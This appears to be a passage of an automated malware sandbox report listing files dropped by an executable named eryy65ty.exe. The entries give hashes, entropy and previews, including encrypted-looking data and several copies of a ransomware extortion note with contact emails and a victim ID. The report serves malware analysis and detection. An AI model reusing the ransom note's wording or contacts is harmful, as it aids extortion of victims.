                                                                                                                                              Preview:.f..8X.X...21.r.<.#*.h.c.....f.n.q.$.Y.lV...DR......^.......=.....z..]...Ij [Z....../...),O..c#.3....Mq..7.]tg.B6].X...qK'.9+..1..[.5. ..>a.4'...wy8..|..k..SYo9!............`......-4....N.EN......B.D.... .&n.....eZ|.y.=.5n.pj;..Elgs...(.4.Ti... dC?.....9.N....G7?.=.h......:...+*...6h.E4LNW.z.G.6..k..*..oil.7....~.9x.8.:...m.e[y.Oe...H..d._..^.....TO5...,Jh.e.[...z._}.c..H..f....1]c...E..p.X1...[]..3./Ww.....p.t.6....."..+..W~|..c....X.B..d.,..3df...G/.2yTh.6.dll..l...CD7..:dw.8.\...\....P...y....:TDB.....].....,8..8..p@0........b...CQ7..X.Y(g....b...abLm.X.V.`.K.=u|.&t....`i...7!..hMc....}X.e.3..|0..l...&.,=_....Ev..)......~.2X...p..n..u..O.h.^y.z...(..In...._s.........<.t.n.)._Q........v......q%8....]n..."S'U7..wX..H..lX.`.5..".K+(Y`..J...T&...K..3..f.....&...?.G\...`.^..........$KOTBz.....O.*b....u../..A..Y.d....g...s.yZ.\.r....q..._5.iQ.....cc,{.O...."Web..QZ.*gu..U72......by.'.-.F..D"<.%n<V.M ...u<.. p.....mM#`d..8h|..brC.tion>..4
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1265
                                                                                                                                              Entropy (8bit):7.846265988988591
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:STErGvkNtjO6FyYKF+ifkhVLdyoYZOslSbnPMlwNe4Im6y9f49JRwygegfcu3+H:pE+77ifkhFdSZAbPswj99eHfgegfcuG
                                                                                                                                              MD5:4FCAAE5A86591802D884C24DF160BF82
                                                                                                                                              SHA1:90D472C1C2ECBA1BC2EF2E163C9307A267B9032C
                                                                                                                                              SHA-256:5D19D90EBE8F3560D7F1D796CFBE56105ECE6EC5F9D64E03C84BD1D27D0F0BD4
                                                                                                                                              SHA-512:795C5E7318AB30D0BE2CF22A364F4EEC872C34970E72EBEC1ACE48BC3062A34DDA5C5CF74F7D4F1EDB0CA2F9B6E92A2806B15C6A42AA159F2DC0916498109FFA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.f..8X.X...21.r.<.#*.h.c.....f.n.q.$.Y.lV...DR......^.......=.....z..]...Ij [Z....../...),O..c#.3....Mq..7.]tg.B6].X...qK'.9+..1..[.5. ..>a.4'...wy8..|..k..SYo9!............`......-4....N.EN......B.D.... .&n.....eZ|.y.=.5n.pj;..Elgs...(.4.Ti... dC?.....9.N....G7?.=.h......:...+*...6h.E4LNW.z.G.6..k..*..oil.7....~.9x.8.:...m.e[y.Oe...H..d._..^.....TO5...,Jh.e.[...z._}.c..H..f....1]c...E..p.X1...[]..3./Ww.....p.t.6....."..+..W~|..c....X.B..d.,..3df...G/.2yTh.6.dll..l...CD7..:dw.8.\...\....P...y....:TDB.....].....,8..8..p@0........b...CQ7..X.Y(g....b...abLm.X.V.`.K.=u|.&t....`i...7!..hMc....}X.e.3..|0..l...&.,=_....Ev..)......~.2X...p..n..u..O.h.^y.z...(..In...._s.........<.t.n.)._Q........v......q%8....]n..."S'U7..wX..H..lX.`.5..".K+(Y`..J...T&...K..3..f.....&...?.G\...`.^..........$KOTBz.....O.*b....u../..A..Y.d....g...s.yZ.\.r....q..._5.iQ.....cc,{.O...."Web..QZ.*gu..U72......by.'.-.F..D"<.%n<V.M ...u<.. p.....mM#`d..8h|..brC.tion>..4
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):292
                                                                                                                                              Entropy (8bit):7.25101651833337
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:D/lph/pI00aAA5/LNr9z6RQmRYaAP8AayVE2+r3ppjD6sJFO/6BXNUHn:D/bD+aAA5/Lx9GvR3HlGE2+1rO/6BXQn
                                                                                                                                              MD5:5DEC5F514CB5DBA67B681CCB632CE91C
                                                                                                                                              SHA1:896657DCA24F71DBE8C1622A2E2B41D01C635527
                                                                                                                                              SHA-256:310349FF53D8D58B4B191D34FEF725728576140EC67E0DAF274A7C6710A6AD96
                                                                                                                                              SHA-512:E9A9D9D75D8B8DF36A629030F6FAF91C13AF7C1D3D922B120F9844E54515AAAAF1E9816AD3BF74F961121DA8AED3466423535DE5CEB8E57696C9E1CDCAE8B414
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.=..[E..N.....u]..........R........]%HL..#..w...12i...h c..X(..V.?\X..ZxY.^...-....m..e.c..o"...?....F......D..o.^O..D...$_..".......ILM...!.U.. .?...9....}.....1.2|..DH,..;".h....M.U."..N]&....p..~79......4.t..2Pa{.o&-a........s)..i.f.oP..I.........+........_.w.F.....0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):64
                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Nlllulfp:NllUf
                                                                                                                                              MD5:0FC4FB02A36BD59474720830F64433BA
                                                                                                                                              SHA1:2C635E8F4241E9CB0E464C10E0E101DCC5923F44
                                                                                                                                              SHA-256:AA5847807809D4B8457937617D9F7CE6F70ACF90D26C3A03C2B502E4B9E937D9
                                                                                                                                              SHA-512:995184FFA68FAC0AEE914908F647961B35C05E4176633FB1840E7A9EB73CE93CEAE6563343BB569D2CEF8C93C637F802051027D8F37BC0FCE105342D2D99FCD4
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:@...e.................................:..............@..........
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):60
                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
